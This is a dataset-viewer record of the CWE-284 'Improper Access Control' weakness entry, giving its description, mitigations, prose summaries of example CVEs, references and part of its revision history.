ID
string | Name
string | Abstraction
string | Structure
string | Status
string | Description
string | ExtendedDescription
string | ApplicablePlatforms
list | AlternateTerms
list | ModesOfIntroduction
list | CommonConsequences
list | PotentialMitigations
list | ObservedExamples
list | AffectedResources
list | TaxonomyMappings
list | RelatedAttackPatterns
list | References
list | Notes
list | ContentHistory
list | MappingNotes_Usage
string | MappingNotes_Rationale
string | MappingNotes_Comments
string | MappingNotes_Reasons
list | MappingNotes_Suggestions
list | RelatedWeaknesses
list | WeaknessOrdinalities
list | DetectionMethods
list | DemonstrativeExamples
list | FunctionalAreas
list | Diagram
string | LikelihoodOfExploit
string | BackgroundDetails
list | NumPaths
int64 | Paths
list | Children
list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
284
|
Improper Access Control
|
Pillar
|
Simple
|
Incomplete
|
The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
|
Access control involves the use of several protection mechanisms such as:
- Authentication (proving the identity of an actor)
- Authorization (ensuring that a given actor can access a resource), and
- Accountability (tracking of activities that were performed)
When any mechanism is not applied or otherwise fails, attackers can compromise the security of the product by gaining privileges, reading sensitive information, executing commands, evading detection, etc.
There are two distinct behaviors that can introduce access control weaknesses:
- Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator.
- Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies.
|
[
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "ICS/OT",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] |
[
{
"Description": "The terms \"access control\" and \"authorization\" are often used interchangeably, although many people have distinct definitions. The CWE usage of \"access control\" is intended as a general term for the various mechanisms that restrict which users can access which resources, and \"authorization\" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms.",
"Term": "Authorization"
}
] |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Other"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "\n\nCompartmentalize the system to have \"safe\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.\n\n\nEnsure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-46",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "A form hosting website only checks the session authentication status for a single form, making it possible to bypass authentication when there are multiple forms",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-24985",
"Reference": "CVE-2022-24985"
},
{
"Description": "Access-control setting in web-based document collaboration tool is not properly implemented by the code, which prevents listing hidden directories but does not prevent direct requests to files in those directories.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29238",
"Reference": "CVE-2022-29238"
},
{
"Description": "Python-based HTTP library did not scope cookies to a particular domain such that \"supercookies\" could be sent to any domain on redirect",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-23607",
"Reference": "CVE-2022-23607"
},
{
"Description": "Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-21972",
"Reference": "CVE-2021-21972"
},
{
"Description": "IT management product does not perform authentication for some REST API requests, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-37415",
"Reference": "CVE-2021-37415"
},
{
"Description": "Firmware for a WiFi router uses a hard-coded password for a BusyBox shell, allowing bypass of authentication through the UART port",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-35033",
"Reference": "CVE-2021-35033"
},
{
"Description": "Bluetooth speaker does not require authentication for the debug functionality on the UART port, allowing root shell access",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-10263",
"Reference": "CVE-2020-10263"
},
{
"Description": "Default setting in workflow management product allows all API requests without authentication, as exploited in the wild per CISA KEV.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-13927",
"Reference": "CVE-2020-13927"
},
{
"Description": "Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2010-4624",
"Reference": "CVE-2010-4624"
}
] |
[
"File or Directory"
] |
[
{
"EntryID": null,
"EntryName": "Access Control List (ACL) errors",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "2",
"EntryName": "Insufficient Authorization",
"MappingFit": null,
"TaxonomyName": "WASC"
},
{
"EntryID": null,
"EntryName": "Missing Access Control",
"MappingFit": null,
"TaxonomyName": "7 Pernicious Kingdoms"
}
] |
[
"19",
"441",
"478",
"479",
"502",
"503",
"536",
"546",
"550",
"551",
"552",
"556",
"558",
"562",
"563",
"564",
"578"
] |
[
{
"Authors": [
"Michael Howard",
"David LeBlanc"
],
"Edition": "2nd Edition",
"ExternalReferenceID": "REF-7",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "12",
"PublicationYear": "2002",
"Publisher": "Microsoft Press",
"Section": "Chapter 6, \"Determining Appropriate Access Control\" Page 171",
"Title": "Writing Secure Code",
"URL": "https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223",
"URLDate": null
},
{
"Authors": [
"Michael Howard",
"David LeBlanc",
"John Viega"
],
"Edition": null,
"ExternalReferenceID": "REF-44",
"Publication": "McGraw-Hill",
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2010",
"Publisher": null,
"Section": "\"Sin 17: Failure to Protect Stored Data.\" Page 253",
"Title": "24 Deadly Sins of Software Security",
"URL": null,
"URLDate": null
},
{
"Authors": [
"MITRE"
],
"Edition": null,
"ExternalReferenceID": "REF-1287",
"Publication": null,
"PublicationDay": "28",
"PublicationMonth": "06",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Details of Problematic Mappings",
"Title": "Supplemental Details - 2022 CWE Top 25",
"URL": "https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25_supplemental.html#problematicMappingDetails",
"URLDate": "2024-11-17"
}
] |
[
{
"Note": "\n\nThis entry needs more work. Possible sub-categories include:\n\n\n - Trusted group includes undesired entities (partially covered by CWE-286)\n\n - Group can perform undesired actions\n\n - ACL parse error does not fail closed\n\n",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Relationships",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Taxonomy_Mappings",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Changed name and description; clarified difference between \"access control\" and \"authorization.\"",
"ModificationDate": "2011-03-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-06-23",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2015-12-07",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings, Type",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes, Relationships",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Description, Observed_Examples, Relationships",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-09-09",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
